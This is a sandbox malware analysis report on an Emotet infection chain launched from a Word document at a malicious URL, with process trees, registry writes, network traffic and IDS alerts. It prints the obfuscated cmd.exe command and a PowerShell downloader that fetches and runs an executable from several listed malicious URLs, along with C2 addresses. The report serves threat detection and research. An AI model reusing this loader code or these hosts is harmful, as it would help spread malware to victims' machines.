| URL: | http://faconex.ma/Payments/012019 |
| Full analysis: | https://app.any.run/tasks/7962f264-b8a7-4a68-9948-0002a4c5f9a7 |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | January 22, 2019, 16:37:12 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 619F61AA4EFEAED92E55C39E0BBE82DB |
| SHA1: | 77C2D7C9C93851BC706948D3B34EE0F95B0C2893 |
| SHA256: | BB7E33CEA918D7954E74A4AFB68E1EEC878A82D216DB7EBF855714E604829888 |
| SSDEEP: | 3:N1KYSL48jzIAL/pc:CYSL48jkEpc |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3572)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3572)
Runs app for hidden code execution
- cmd.exe (PID: 612)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 2700)
Application was dropped or rewritten from another process
- 422.exe (PID: 3164)
- 422.exe (PID: 2332)
- wabmetagen.exe (PID: 3132)
- wabmetagen.exe (PID: 3916)
EMOTET was detected
- wabmetagen.exe (PID: 3916)
Executes PowerShell scripts
- cmd.exe (PID: 2336)
Connects to CnC server
- wabmetagen.exe (PID: 3916)
Changes the autorun value in the registry
- wabmetagen.exe (PID: 3916)
Downloads executable files from the Internet
- powershell.exe (PID: 2700)
SUSPICIOUS
Application launched itself
- WINWORD.EXE (PID: 3572)
- cmd.exe (PID: 3520)
- cmd.exe (PID: 612)
Starts Microsoft Office Application
- iexplore.exe (PID: 2988)
- WINWORD.EXE (PID: 3572)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3520)
- cmd.exe (PID: 612)
Executable content was dropped or overwritten
- powershell.exe (PID: 2700)
- 422.exe (PID: 3164)
Creates files in the user directory
- powershell.exe (PID: 2700)
Starts itself from another location
- 422.exe (PID: 3164)
Connects to unusual port
- wabmetagen.exe (PID: 3916)
INFO
Reads Internet Cache Settings
- iexplore.exe (PID: 2988)
- iexplore.exe (PID: 3160)
Reads internet explorer settings
- iexplore.exe (PID: 3160)
Creates files in the user directory
- WINWORD.EXE (PID: 3572)
- iexplore.exe (PID: 3160)
- iexplore.exe (PID: 2988)
Application launched itself
- iexplore.exe (PID: 2988)
Changes internet zones settings
- iexplore.exe (PID: 2988)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3572)
- WINWORD.EXE (PID: 2456)
Dropped object may contain Bitcoin addresses
- 422.exe (PID: 3164)
- powershell.exe (PID: 2700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
46
Monitored processes
13
Malicious processes
8
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 612 | CmD /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1688 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2332 | "C:\Users\admin\AppData\Local\Temp\422.exe" | C:\Users\admin\AppData\Local\Temp\422.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 Modules
| |||||||||||||||
| 2336 | cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2700 | powershell $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2988 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3132 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 422.exe | |||||||||||
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 Modules
| |||||||||||||||
| 3160 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2988 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3164 | "C:\Users\admin\AppData\Local\Temp\422.exe" | C:\Users\admin\AppData\Local\Temp\422.exe | 422.exe | ||||||||||||
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 Modules
| |||||||||||||||
Total events
3 145
Read events
2 591
Write events
542
Delete events
12
Modification events
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones |
| Operation: | write | Name: | SecuritySafe |
Value: 1 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active |
| Operation: | write | Name: | {00D841AD-1E64-11E9-91D7-5254004A04AF} |
Value: 0 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Type |
Value: 4 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Count |
Value: 3 | |||
| (PID) Process: | (2988) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Time |
Value: E307010002001600100025001C00ED02 | |||
Executable files
2
Suspicious files
4
Text files
10
Unknown types
5
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2988 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
| 2988 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
| 3160 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@faconex[2].txt | — | |
MD5:— | SHA256:— | |||
| 3572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7674.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2F0C1C6C-EADD-4A29-B4B3-B66FAB198A24.0\4B890601.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
| 2456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2F0C1C6C-EADD-4A29-B4B3-B66FAB198A24.0\A7E1F7EF.jpg | — | |
MD5:— | SHA256:— | |||
| 3572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\472B40E.jpg | — | |
MD5:— | SHA256:— | |||
| 2456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2F0C1C6C-EADD-4A29-B4B3-B66FAB198A24.0\~WRS{0B4176F3-B04C-4116-BD0A-7A3CCD485F4B}.tmp | — | |
MD5:— | SHA256:— | |||
| 2700 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X976S8DOWL7GBSSLUGGG.temp | — | |
MD5:— | SHA256:— | |||
| 2988 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019012220190123\index.dat | dat | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
11
DNS requests
5
Threats
14
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2700 | powershell.exe | GET | 301 | 46.242.177.30:80 | http://agatawierzbicka.com//MdM5N5SCi | PL | html | 245 b | suspicious |
2700 | powershell.exe | GET | 200 | 46.242.177.30:80 | http://agatawierzbicka.com/MdM5N5SCi/ | PL | executable | 513 Kb | suspicious |
3160 | iexplore.exe | GET | 301 | 213.186.33.40:80 | http://faconex.ma/Payments/012019 | FR | html | 242 b | malicious |
2988 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3160 | iexplore.exe | GET | — | 213.186.33.40:80 | http://faconex.ma/Payments/012019/ | FR | — | — | malicious |
3916 | wabmetagen.exe | GET | — | 200.125.113.60:8080 | http://200.125.113.60:8080/ | AR | — | — | malicious |
3160 | iexplore.exe | GET | — | 213.186.33.40:80 | http://faconex.ma/Payments/012019/ | FR | — | — | malicious |
3160 | iexplore.exe | GET | 200 | 213.186.33.40:80 | http://faconex.ma/Payments/012019/ | FR | xml | 191 Kb | malicious |
3916 | wabmetagen.exe | GET | 200 | 75.159.115.228:990 | http://75.159.115.228:990/ | CA | binary | 132 b | malicious |
3160 | iexplore.exe | GET | 200 | 213.186.33.40:80 | http://faconex.ma/Payments/012019/ | FR | xml | 191 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2988 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2700 | powershell.exe | 46.242.177.30:80 | agatawierzbicka.com | home.pl S.A. | PL | suspicious |
3916 | wabmetagen.exe | 200.125.113.60:8080 | — | Telecentro S.A. | AR | malicious |
3916 | wabmetagen.exe | 75.159.115.228:990 | — | TELUS Communications Inc. | CA | malicious |
3916 | wabmetagen.exe | 190.216.238.62:22 | — | Level 3 Communications, Inc. | VE | malicious |
2988 | iexplore.exe | 213.186.33.40:80 | faconex.ma | OVH SAS | FR | malicious |
3160 | iexplore.exe | 213.186.33.40:80 | faconex.ma | OVH SAS | FR | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |
faconex.ma |
| malicious |
agatawierzbicka.com |
| suspicious |
dns.msftncsi.com |
| shared |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3160 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
3160 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
3160 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
3160 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
2700 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2700 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2700 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3160 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
3916 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3916 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2 ETPRO signatures available at the full report